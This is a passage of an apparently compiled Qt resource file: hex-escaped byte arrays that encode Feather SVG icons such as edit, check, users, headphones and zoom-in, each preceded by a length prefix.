\x20\x32\x68\x2d\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x30\x20\x31\x37\x20\x31\x35\x20\x31\x32\x20\x31\x30\x20\x37\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x31\
\x32\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x32\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x64\x69\x74\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x31\x20\x34\x48\
\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x32\x76\
\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\
\x68\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x76\x2d\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x2e\x35\x20\x32\x2e\x35\x61\
\x32\x2e\x31\x32\x31\x20\x32\x2e\x31\x32\x31\x20\x30\x20\x30\x20\
\x31\x20\x33\x20\x33\x4c\x31\x32\x20\x31\x35\x6c\x2d\x34\x20\x31\
\x20\x31\x2d\x34\x20\x39\x2e\x35\x2d\x39\x2e\x35\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x8f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x69\x67\x6e\
\x2d\x6a\x75\x73\x74\x69\x66\x79\x22\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\
\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x32\x31\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\
\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\
\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\
\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x38\
\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x64\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x65\x72\x74\
\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\
\x36\x22\x20\x78\x32\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x06\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x63\x6b\
\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x30\x20\x36\x20\x39\x20\x31\x37\x20\x34\x20\
\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x35\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x79\x6f\x75\x74\x75\
\x62\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\
\x2e\x35\x34\x20\x36\x2e\x34\x32\x61\x32\x2e\x37\x38\x20\x32\x2e\
\x37\x38\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x39\x34\x2d\x32\x43\
\x31\x38\x2e\x38\x38\x20\x34\x20\x31\x32\x20\x34\x20\x31\x32\x20\
\x34\x73\x2d\x36\x2e\x38\x38\x20\x30\x2d\x38\x2e\x36\x2e\x34\x36\
\x61\x32\x2e\x37\x38\x20\x32\x2e\x37\x38\x20\x30\x20\x30\x20\x30\
\x2d\x31\x2e\x39\x34\x20\x32\x41\x32\x39\x20\x32\x39\x20\x30\x20\
\x30\x20\x30\x20\x31\x20\x31\x31\x2e\x37\x35\x61\x32\x39\x20\x32\
\x39\x20\x30\x20\x30\x20\x30\x20\x2e\x34\x36\x20\x35\x2e\x33\x33\
\x41\x32\x2e\x37\x38\x20\x32\x2e\x37\x38\x20\x30\x20\x30\x20\x30\
\x20\x33\x2e\x34\x20\x31\x39\x63\x31\x2e\x37\x32\x2e\x34\x36\x20\
\x38\x2e\x36\x2e\x34\x36\x20\x38\x2e\x36\x2e\x34\x36\x73\x36\x2e\
\x38\x38\x20\x30\x20\x38\x2e\x36\x2d\x2e\x34\x36\x61\x32\x2e\x37\
\x38\x20\x32\x2e\x37\x38\x20\x30\x20\x30\x20\x30\x20\x31\x2e\x39\
\x34\x2d\x32\x20\x32\x39\x20\x32\x39\x20\x30\x20\x30\x20\x30\x20\
\x2e\x34\x36\x2d\x35\x2e\x32\x35\x20\x32\x39\x20\x32\x39\x20\x30\
\x20\x30\x20\x30\x2d\x2e\x34\x36\x2d\x35\x2e\x33\x33\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\x2e\x37\x35\x20\x31\x35\x2e\
\x30\x32\x20\x31\x35\x2e\x35\x20\x31\x31\x2e\x37\x35\x20\x39\x2e\
\x37\x35\x20\x38\x2e\x34\x38\x20\x39\x2e\x37\x35\x20\x31\x35\x2e\
\x30\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x73\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\x20\x32\
\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\
\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x34\
\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\
\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x39\x22\x20\x63\x79\x3d\x22\
\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x33\x20\x32\
\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\x30\x20\x30\x2d\x33\
\x2d\x33\x2e\x38\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\x20\x33\x2e\x31\x33\x61\
\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x30\x20\x37\x2e\x37\x35\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x8b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x61\x64\x70\
\x68\x6f\x6e\x65\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x33\x20\x31\x38\x76\x2d\x36\x61\x39\x20\x39\x20\x30\x20\x30\
\x20\x31\x20\x31\x38\x20\x30\x76\x36\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\
\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x68\
\x2d\x31\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\
\x76\x2d\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\
\x32\x68\x33\x7a\x4d\x33\x20\x31\x39\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x20\x32\x68\x31\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x2d\x32\x76\x2d\x33\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x2d\x32\x2d\x32\x48\x33\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x15\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6e\x61\x76\x69\x67\
\x61\x74\x69\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x33\x20\x31\x31\x20\x32\x32\x20\
\x32\x20\x31\x33\x20\x32\x31\x20\x31\x31\x20\x31\x33\x20\x33\x20\
\x31\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x43\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x61\x73\x74\x2d\
\x66\x6f\x72\x77\x61\x72\x64\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\
\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x33\x20\x31\x39\x20\
\x32\x32\x20\x31\x32\x20\x31\x33\x20\x35\x20\x31\x33\x20\x31\x39\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x70\x6f\x6c\
\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x20\x31\
\x39\x20\x31\x31\x20\x31\x32\x20\x32\x20\x35\x20\x32\x20\x31\x39\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x8d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x6f\x6f\x6d\x2d\
\x69\x6e\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\x20\x72\x3d\x22\x38\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x32\x31\x22\
\x20\x78\x32\x3d\x22\x31\x36\x2e\x36\x35\x22\x20\x79\x32\x3d\x22\
\x31\x36\x2e\x36\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x31\x22\x20\x79\x31\x3d\x22\
\x38\x22\x20\x78\x32\x3d\x22\x31\x31\x22\x20\x79\x32\x3d\x22\x31\
\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\
\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xaf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x2d\
\x70\x6c\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x34\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x2d\x32\x20\x32\x76\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x20\x32\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x2d\x32\x56\x38\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x34\x20\x32\x20\x31\x34\x20\x38\x20\x32\x30\
\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\
\x22\x31\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\
\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x31\x35\x22\
\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\x32\x3d\x22\x31\x35\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
